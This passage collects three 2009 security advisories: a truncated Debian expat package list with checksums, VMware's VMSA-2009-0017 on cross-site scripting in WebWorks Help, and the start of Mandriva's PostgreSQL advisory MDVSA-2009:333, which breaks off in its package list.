http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_alpha.deb
Size/MD5 checksum: 143250 ac848be2b40296fbdf3a6a6eeed551f4
http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_alpha.deb
Size/MD5 checksum: 22360 e3b52bc716fa975c4cc43cc9a00a4546

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_amd64.deb
Size/MD5 checksum: 64628 0ebf8bb1e3b55cf8e751f638881eee14
http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_amd64.deb
Size/MD5 checksum: 21518 4ee3b94bccadb231c5ee8e47b9ebe053
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_amd64.udeb
Size/MD5 checksum: 56436 e856562cc8156f88ef07d3b79aac9336
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_amd64.deb
Size/MD5 checksum: 133908 30ba0c9b11641b960327577a65ff4423

arm architecture (ARM)

http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_arm.deb
Size/MD5 checksum: 57250 1b0a1f0cf411bb0d437f3a01e5cd3593
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_arm.deb
Size/MD5 checksum: 126100 0f0bcf322522ee564f1c006b9172a873
http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_arm.deb
Size/MD5 checksum: 19798 eaea089d8c4d2bfc14ecf7a72f149202
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_arm.udeb
Size/MD5 checksum: 49400 07e75e50c1b7adae634d77763bd5e86e

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_hppa.deb
Size/MD5 checksum: 149462 2a9bead50733246e3cc1f8b52c283d6c
http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_hppa.deb
Size/MD5 checksum: 22684 44dd6038115624b780f51314b38d1819
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_hppa.udeb
Size/MD5 checksum: 64792 aa392afb507d07a4eb4061e6368afd04
http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_hppa.deb
Size/MD5 checksum: 73014 a8317a8f7a03f9aa5561fe43fbbdbcae

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_i386.deb
Size/MD5 checksum: 63130 28f26b307f7cb5b133c7d7b0b7f336dc
http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_i386.deb
Size/MD5 checksum: 21090 67a8e21213321cf54be9dc58380ce45f
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_i386.deb
Size/MD5 checksum: 129822 4e06399f0079e7608d25430ded374d97
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_i386.udeb
Size/MD5 checksum: 54984 64b2c0654425bd1234f5394efb1e2d69

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_ia64.udeb
Size/MD5 checksum: 87362 c78054403944437ce5ddfa700ee04532
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_ia64.deb
Size/MD5 checksum: 164964 11efdcba7612853f816112c1b99437d0
http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_ia64.deb
Size/MD5 checksum: 25076 e6f02ab66bde8b7de92ef2d97b60f9c0
http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_ia64.deb
Size/MD5 checksum: 95858 fe960e6af68f6e12429ee8eb600d80f9

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_mips.udeb
Size/MD5 checksum: 56612 a917e2fe1206a9614fb7b9c04eb88a86
http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_mips.deb
Size/MD5 checksum: 21600 fbcd5b817b80aaa9856698d68a6fa455
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_mips.deb
Size/MD5 checksum: 141918 dc95f50a8665aeb063885bc989d1315f
http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_mips.deb
Size/MD5 checksum: 64702 cd4cee2ee2b4cb36d6f822998c5d7d20

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_powerpc.deb
Size/MD5 checksum: 22948 50ae9c0fa46faebf9a4eafeb2fb40b9a
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_powerpc.udeb
Size/MD5 checksum: 59448 4d212532482851f7a463ede5419f1791
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_powerpc.deb
Size/MD5 checksum: 148146 381b2f1b56ec4b803cf904e0cd58e4ec
http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_powerpc.deb
Size/MD5 checksum: 67650 de0a12471a24bc12da5c7b4cd33bba07

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_s390.deb
Size/MD5 checksum: 64906 f480563f4ff6a0f77dbd0a490a973b9d
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_s390.udeb
Size/MD5 checksum: 56770 7854d9f4ce32b1963ede0790b69904d0
http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_s390.deb
Size/MD5 checksum: 21420 d039dacbda9db203d23281317a8ddd3c
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_s390.deb
Size/MD5 checksum: 132506 d194bdb366195ba2402999a2cad5aa4d

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_sparc.deb
Size/MD5 checksum: 128580 39bf980ed2bfd1a5f332b48c5f4b355b
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_sparc.udeb
Size/MD5 checksum: 51882 84810453c7288687eebcd5822c4525ca
http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_sparc.deb
Size/MD5 checksum: 59824 b71d2a54edf53c92d97b1faa63930134
http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_sparc.deb
Size/MD5 checksum: 20394 7f1bc9c83495ab50c03701e6ef125332

Debian GNU/Linux 5.0 alias lenny (stable)
- -----------------------------------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1.orig.tar.gz
Size/MD5 checksum: 446456 ee8b492592568805593f81f8cdf2a04c
http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2.dsc
Size/MD5 checksum: 1438 556771752cdeb9b854aae0ecd060e1c5
http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2.diff.gz
Size/MD5 checksum: 133845 424badd53b1147b260c2dfd3b7c5f153

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_alpha.udeb
Size/MD5 checksum: 62898 289c10af11866f2862eebe1920910969
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_alpha.deb
Size/MD5 checksum: 221130 e5c4f3465c09b47b47b2959b44aeed09
http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_alpha.deb
Size/MD5 checksum: 24628 92666b01407635c4829fc5fea10237b3
http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_alpha.deb
Size/MD5 checksum: 135844 331e0b3b6c41c716686de6eb7408024d

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_amd64.deb
Size/MD5 checksum: 223306 6736ebbd46ddb4f03c7731c9ad893d27
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_amd64.udeb
Size/MD5 checksum: 62810 e8bcc7686a563b52372f1d03b5e39106
http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_amd64.deb
Size/MD5 checksum: 23898 688c33641259b60883572206e151449a
http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_amd64.deb
Size/MD5 checksum: 136360 752cdbf7c744780a629272335fa52779

arm architecture (ARM)

http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_arm.udeb
Size/MD5 checksum: 52720 27a3e489f7ca8ad52bfc076a81348900
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_arm.deb
Size/MD5 checksum: 203330 63309ffa0125a0ebf1c4d60831a0f365
http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_arm.deb
Size/MD5 checksum: 22108 165b6b7584589a653b5c8f6e2619f020
http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_arm.deb
Size/MD5 checksum: 116164 979ed610597f6e64ae7646e0c93b0d32

armel architecture (ARM EABI)

http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_armel.deb
Size/MD5 checksum: 209090 33d3e6b4e7df0e01ea86a61fbb5b4240
http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_armel.deb
Size/MD5 checksum: 22362 44191b6e3c34c571089c23710da67d5d
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_armel.udeb
Size/MD5 checksum: 54240 9bade1198036f567e35d8cc6f37312ea
http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_armel.deb
Size/MD5 checksum: 118714 7bcda4ddc2817c8aab259378dc660a0c

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_hppa.udeb
Size/MD5 checksum: 69456 1ff6cd259068a168fa229abaf71cc985
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_hppa.deb
Size/MD5 checksum: 261136 bde3165254c6034c331a54c0560d4fcb
http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_hppa.deb
Size/MD5 checksum: 24828 bb26c745fbb3e3cd9446cb01cc0ad4e7
http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_hppa.deb
Size/MD5 checksum: 148662 f955833df5ed41fdedc3d5090a43a8e5

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_i386.udeb
Size/MD5 checksum: 60816 009c3b55eeeaa87476ff658c5c654791
http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_i386.deb
Size/MD5 checksum: 23288 529f392c091e9e09f74e21e77da69f0c
http://security.debian.org/pool/updates/main/e/expat/lib64expat1-dev_2.0.1-4+lenny2_i386.deb
Size/MD5 checksum: 168162 01b2166f38485842aab660f0a397487a
http://security.debian.org/pool/updates/main/e/expat/lib64expat1_2.0.1-4+lenny2_i386.deb
Size/MD5 checksum: 136330 11942d4c9c36b25882db662b9edf1981
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_i386.deb
Size/MD5 checksum: 210542 54ea496b626a1875b6d7cf7519008ec3
http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_i386.deb
Size/MD5 checksum: 131876 8c8a91854bf5ee9eec30fda926519bef

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_ia64.deb
Size/MD5 checksum: 27426 7d194ae6b0473db3ff5470c10938d964
http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_ia64.deb
Size/MD5 checksum: 206162 b5b5cd0448f4d4405e547083158d0b33
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_ia64.deb
Size/MD5 checksum: 291698 3c2fa7560629d402db2fe09cacf78d65
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_ia64.udeb
Size/MD5 checksum: 98262 d2fe5be42499f8cc35727ad1febaba15

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_mips.deb
Size/MD5 checksum: 234414 c1fe34bff578c026a950a7c3f4c4d771
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_mips.udeb
Size/MD5 checksum: 61214 4670ea4ec04854955699ef5d1115322f
http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_mips.deb
Size/MD5 checksum: 23794 294282bd2e09d86cdcecb2c7be16a2c7
http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_mips.deb
Size/MD5 checksum: 132784 8ee0a7eabf9781a087dccc9348d9e5c0

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_mipsel.deb
Size/MD5 checksum: 224124 d846357e369b14081f16cc1576bda554
http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_mipsel.deb
Size/MD5 checksum: 131716 ab80da25bb702bf1eda5659949931cf3
http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_mipsel.deb
Size/MD5 checksum: 23812 0eab513e87cdc4b6af912e8c9b9eb97d
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_mipsel.udeb
Size/MD5 checksum: 60652 571cd4e1defdffbd231b4f1c30317933

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_powerpc.deb
Size/MD5 checksum: 140454 57b59323a8fd3f989c4b887a2f435edc
http://security.debian.org/pool/updates/main/e/expat/lib64expat1_2.0.1-4+lenny2_powerpc.deb
Size/MD5 checksum: 143938 14c14076db484cc958e72b9fc4c566db
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_powerpc.deb
Size/MD5 checksum: 280288 9fadfb58e2302a8b6f57297e65dfd8d3
http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_powerpc.deb
Size/MD5 checksum: 26806 72bac1cc1d74623ba6494645bc4289ab
http://security.debian.org/pool/updates/main/e/expat/lib64expat1-dev_2.0.1-4+lenny2_powerpc.deb
Size/MD5 checksum: 156730 2aca152555c73b700d1726d1eded7fe4
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_powerpc.udeb
Size/MD5 checksum: 64998 989f172b6599508c436bc5a09c91c4f5

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_s390.deb
Size/MD5 checksum: 220156 c7fc9bb8b053a250ab3e37bfb2bb5f48
http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_s390.deb
Size/MD5 checksum: 24202 f1db3ff06b30af0f9a37669346b03647
http://security.debian.org/pool/updates/main/e/expat/lib64expat1_2.0.1-4+lenny2_s390.deb
Size/MD5 checksum: 134506 d64a081f5c330c143361c5a1adfbe960
http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_s390.deb
Size/MD5 checksum: 134478 45bf7476a951dd3d6fb44a230c507f20
http://security.debian.org/pool/updates/main/e/expat/lib64expat1-dev_2.0.1-4+lenny2_s390.deb
Size/MD5 checksum: 173076 c2cb8d4e8b9c5f0aaf3700e6efad34e8
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_s390.udeb
Size/MD5 checksum: 61936 c87e11d3c3759892c3d6b6f418c2bb95

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_sparc.udeb
Size/MD5 checksum: 57658 13a0ac88f44285d0d86dcd38d3deff70
http://security.debian.org/pool/updates/main/e/expat/lib64expat1_2.0.1-4+lenny2_sparc.deb
Size/MD5 checksum: 133572 8bab47cce6aabb7d2038c6d528ff02a3
http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_sparc.deb
Size/MD5 checksum: 23164 4a504bfeb56ecce8f1b7aaaee11b138b
http://security.debian.org/pool/updates/main/e/expat/lib64expat1-dev_2.0.1-4+lenny2_sparc.deb
Size/MD5 checksum: 171696 8e6d324c284db7a61854d544cb49418e
http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_sparc.deb
Size/MD5 checksum: 125636 1ab1d2f419627c15d5fb557c515937f6
http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_sparc.deb
Size/MD5 checksum: 216610 ec3f0144dd15d23fb9bc188b52a26f78

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@...
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iD8DBQFLJ++jbxelr8HyTqQRAne2AJ0XhVqrv1+W8I5uFhFjeybYIrvTAwCgoWfG
FASZTGkJPeI/o5ja76ls01w=
=XgUm
-----END PGP SIGNATURE-----

VMSA-2009-0017 VMware vCenter, ESX patch and vCenter Lab Manager releases address cross-site scripting issues

2009-12-15T10:33:49Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----------------------------------------------------------------------
VMware Security Advisory

Advisory ID: VMSA-2009-0017
Synopsis: VMware vCenter, ESX patch and vCenter Lab Manager
releases address cross-site scripting issues
Issue date: 2009-12-15
Updated on: 2009-12-15 (initial release of advisory)
CVE numbers: CVE-2009-3731
- -----------------------------------------------------------------------

1. Summary

VMware vCenter and ESX update releases address cross-site scripting
issues in the Help functionality of WebAccess. A vCenter Lab Manager
release addresses the same issues which are present in the online
Help functionality of Lab Manager and Stage Manager.

2. Relevant releases

ESX 4.0 without patch ESX400-200911223-UG
vCenter 4.0 GA
VMware Server 2.0.2
VMware Lab Manager 2.x
VMware vCenter Lab Manager 3.x
VMware vCenter Lab Manager 4.0
VMware vCenter Stage Manager 1.x

3. Problem Description

a. WebWorks Help - Cross-site scripting vulnerability

WebWorks Help is an output format that allows online Help to be
delivered on multiple platforms and browsers, which makes it easy
to publish information on the Web or on an enterprise intranet.
WebWorks Help is used for creating the online help pages that are
available in VMware WebAccess, Lab Manager and Stage Manager.

WebWorks Help doesn't sufficiently sanitize incoming requests which
may result in cross-site scripting vulnerabilities in applications
that are built with WebWorks Help.

Exploitation of these vulnerabilities in VMware products requires
tricking a user to click on a malicious link or to open a malicious
web page while they are logged in into vCenter, ESX or VMware
Server using WebAccess, or logged in into Stage Manager or Lab
Manager.

Successful exploitation can lead to theft of user credentials. These
vulnerabilities can be exploited remotely only if the attacker has
access to the Service Console network.

Security best practices provided by VMware recommend that the
Service Console be isolated from the VM network. Please see
http://www.vmware.com/resources/techresources/726 for more
information on VMware security best practices.

Client-side protection measures included with current browsers are not
always able to prevent these attacks from being executed.

VMware would like to thank Daniel Grzelak and Alex Kouzemtchenko of
stratsec (www.stratsec.net) for finding and reporting this issue.
VMware would also like to thank Ben Allums of WebWorks.com for working
on the remediation of this issue with us.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2009-3731 to this issue.

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.

VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 4.0 Windows Update 1
VirtualCenter 2.5 Windows not affected
VirtualCenter 2.0.2 Windows not affected

Workstation any any not affected

Player any any not affected

Server 2.0.2 any VMware KB 1016594
Server 1.0 any not affected

ACE any any not affected

Fusion any any not affected

ESXi any ESXi not affected

ESX 4.0 ESX ESX400-200911223-UG
ESX 3.5 ESX not affected
ESX 3.0.3 ESX not affected
ESX 2.5.5 ESX not affected

vMA 4.0 RHEL5 not affected

Lab Manager any any Lab Manager 4.0.1

Stage Manager any any Lab Manager 4.0.1

Note: The remediation provided by WebWorks.com is not applicable
to VMware products.

4. Solution

Please review the patch/release notes for your product and version
and verify the md5sum of your downloaded file.

VMware vCenter Server 4 Update 1
--------------------------------
Version 4.0 Update 1
Build Number 208156
Release Date 2009/11/19
Type Product Binaries
http://downloads.vmware.com/download/download.do?downloadGroup=VC40U1

VMware vCenter Server 4 and modules
File size: 1.8 GB
File type: .iso
MD5SUM: 057d55b32eb27fe5f3e01bc8d3df3bc5
SHA1SUM: c90134418c2e4d3d6637d8bee44261300ad95ec1

VMware vCenter Server 4 and modules
File size: 1.5 GB
File type: .zip
MD5SUM: f843d9c19795eb3bc5a77f5c545468a8
SHA1SUM: 9a7abd8e70bd983151e2ee40e1b3931525c4480c

VMware vSphere Client and Host Update Utility
File size: 113.8 MB
File type: .exe
MD5SUM: 6cc6b2c958e7e9529c284e48dfae22a9
SHA1SUM: f4c19c63a75d93cffc57b170066358160788c959

VMware vCenter Converter BootCD
File size: 98.8 MB
File type: .zip
MD5SUM: 3df94eb0e93de76b0389132ada2a3799
SHA1SUM: 5d7c04e4f9f8ae25adc8de5963fefd8a4c92464c

VMware vCenter Converter CLI (Linux)
File size: 36.9 MB
File type: .tar.gz
MD5SUM: 3766097563936ba5e03e87e898f6bd48
SHA1SUM: 36d485bdb5eb279296ce8c8523df04bfb12a2cb4

ESX 4.0
-------
ESX400-200911223-UG (Update 1a)

https://hostupdate.vmware.com/software/VUM/OFFLINE/release-166-20091202-254
879/ESX-4.0.0-update01a.zip
md5sum: 99c1fcafbf0ca105ce73840d686e9914
sha1sum: aa8a23416271bc28b6b8f6bdbe00045e36314ebb
http://kb.vmware.com/kb/1014842

To install an individual bulletin use esxupdate with the -b option.
esxupdate --bundle=ESX-4.0.0-update01.zip -b ESX400-200911223-UG

VMware Server 2.0.2
-------------------
http://kb.vmware.com/kb/1016594

Stage Manager
-------------
http://www.vmware.com/products/sm/faq.html

Lab Manager 4.0.1
-----------------
http://downloads.vmware.com/download/download.do?downloadGroup=VLM401
md5sum: b4d8f5637eaea59f028eafe62d0366ab
sha1sum: a437726b45dce0a72fb5cbd3996a6d6f84e6c8df

http://www.vmware.com/support/labmanager40/doc/releasenotes_labmanager401.h
tml

5. References

http://www.webworks.com/Security/2009-0001

CVE numbers
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3731

- ------------------------------------------------------------------------
6. Change log

2009-12-15 VMSA-2009-0017
Initial security advisory after publication of information by third
party vendor, WebWorks.com, on 2009-12-15.

- -----------------------------------------------------------------------
7. Contact

E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center
http://www.vmware.com/security

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

Copyright 2009 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8

wj8DBQFLJ9Z2S2KysvBH1xkRAiiOAJ4+TWKnhkLYDiDargvqosRU6RHn1ACeJtXe
oEsepbtYQRxE45xLZgJnaAQ=
=F9Pg
-----END PGP SIGNATURE-----

[ MDVSA-2009:333 ] postgresql

2009-12-15T10:27:01Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2009:333
http://www.mandriva.com/security/
_______________________________________________________________________

Package : postgresql
Date : December 15, 2009
Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 3.0, Corporate 4.0,
Enterprise Server 5.0
_______________________________________________________________________

Problem Description:

Multiple vulnerabilities was discovered and corrected in postgresql:

NULL Bytes in SSL Certificates can be used to falsify client or server
authentication. This only affects users who have SSL enabled, perform
certificate name validation or client certificate authentication,
and where the Certificate Authority (CA) has been tricked into
issuing invalid certificates. The use of a CA that can be trusted to
always issue valid certificates is recommended to ensure you are not
vulnerable to this issue (CVE-2009-4034).

Privilege escalation via changing session state in an index
function. This closes a corner case related to vulnerabilities
CVE-2009-3230 and CVE-2007-6600 (CVE-2009-4136).

Packages for 2008.0 are being provided due to extended support for
Corporate products.

This update provides a solution to these vulnerabilities.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4034
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4136
http://www.postgresql.org/support/security
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2008.0:
7a4134b7ab1675be4c53ff6b4922d7e0 2008.0/i586/libecpg5-8.2.15-0.1mdv2008.0.i586.rpm
b8fe1351d19899fbca1a67929b0b4be7 2008.0/i586/libecpg-devel-8.2.15-0.1mdv2008.0.i586.rpm
e86a98de348ba90bc6a1f16f02daa6e1 2008.0/i586/libpq5-8.2.15-0.1mdv2008.0.i586.rpm
551363cff118bee0b87dd827dddce669 2008.0/i586/libpq-devel-8.2.15-0.1mdv2008.0.i586.rpm
ef3c1b9a831fedf1399f8b72cd65f748 2008.0/i586/postgresql-8.2.15-0.1mdv2008.0.i586.rpm
d308631e61cd6236e40827b78c9c2951 2008.0/i586/postgresql8.2-8.2.15-0.1mdv2008.0.i586.rpm
f8e97d697f69e43dc4bb2a96e64600cd 2008.0/i586/postgresql8.2-contrib-8.2.15-0.1mdv2008.0.i586.rpm
863015525b015c812f963a2af63fc7dd 2008.0/i586/postgresql8.2-devel-8.2.15-0.1mdv2008.0.i586.rpm
6340e0530e254732d654d8f6211d5198 2008.0/i586/postgresql8.2-docs-8.2.15-0.1mdv2008.0.i586.rpm
e098dee5477edb0b7549b65ddb440cb5 2008.0/i586/postgresql8.2-pl-8.2.15-0.1mdv2008.0.i586.rpm
05cda82443737a12c7c8c3622e762618 2008.0/i586/postgresql8.2-plperl-8.2.15-0.1mdv2008.0.i586.rpm
6a66bc2cc80538a4db3e44ca97740a7f 2008.0/i586/postgresql8.2-plpgsql-8.2.15-0.1mdv2008.0.i586.rpm
d01866d6fa8d18865e8f47744d0053bd 2008.0/i586/postgresql8.2-plpython-8.2.15-0.1mdv2008.0.i586.rpm
0e250c776673c8595ed4f57194ceff15 2008.0/i586/postgresql8.2-pltcl-8.2.15-0.1mdv2008.0.i586.rpm
f69196c2af80f25abaae6cdb5273a985 2008.0/i586/postgresql8.2-server-8.2.15-0.1mdv2008.0.i586.rpm
5c96b2bdfdb5f4b23280de184d76bb4c 2008.0/i586/postgresql8.2-test-8.2.15-0.1mdv2008.0.i586.rpm
6c203c33bef69b8f676d1acd782d3526 2008.0/i586/postgresql-devel-8.2.15-0.1mdv2008.0.i586.rpm
37b86e7869ce8ef7621eb5f2fbeb9804 2008.0/SRPMS/postgresql8.2-8.2.15-0.1mdv2008.0.src.rpm

Mandriva Linux 2008.0/X86_64:
ef654ee6768a32df7021cb7c1b95151d 2008.0/x86_64/lib64ecpg5-8.2.15-0.1mdv2008.0.x86_64.rpm
4272c2616fce89a650e102effb3e2427 2008.0/x86_64/lib64ecpg-devel-8.2.15-0.1mdv2008.0.x86_64.rpm
a45cc8104b4758913384375c6f9d993b 2008.0/x86_64/lib64pq5-8.2.15-0.1mdv2008.0.x86_64.rpm
a5beab729e5e4c04374f44b8ed0e7c0d 2008.0/x86_64/lib64pq-devel-8.2.15-0.1mdv2008.0.x86_64.rpm
bc9a43e16b3fe38c26011f76e6e796ea 2008.0/x86_64/postgresql-8.2.15-0.1mdv2008.0.x86_64.rpm
632cc2bd4f2d099de6f18cc5a4ed28b9 2008.0/x86_64/postgresql8.2-8.2.15-0.1mdv2008.0.x86_64.rpm
da76130aeaec4d962904ed0c2c566c63 2008.0/x86_64/postgresql8.2-contrib-8.2.15-0.1mdv2008.0.x86_64.rpm
9061e32e63cc8dfc68a393dc986b6b92 2008.0/x86_64/postgresql8.2-devel-8.2.15-0.1mdv2008.0.x86_64.rpm
2d88f5b268d6661771fd76eccbca7f82 2008.0/x86_64/postgresql8.2-docs-8.2.15-0.1mdv2008.0.x86_64.rpm
46a1f1beb87d1a3618470b5a1427b53d 2008.0/x86_64/postgresql8.2-pl-8.2.15-0.1mdv2008.0.x86_64.rpm
a8126282c514a3b22736c6bf2d3ca570 2008.0/x86_64/postgresql8.2-plperl-8.2.15-0.1mdv2008.0.x86_64.rpm
5aada115ff9cd3c44cd9032d88bd93c4 2008.0/x86_64/postgresql8.2-plpgsql-8.2.15-0.1mdv2008.0.x86_64.rpm
4c9433b70a16300a304ee04b3aeb7abe 2008.0/x86_64/postgresql8.2-plpython-8.2.15-0.1mdv2008.0.x86_64.rpm
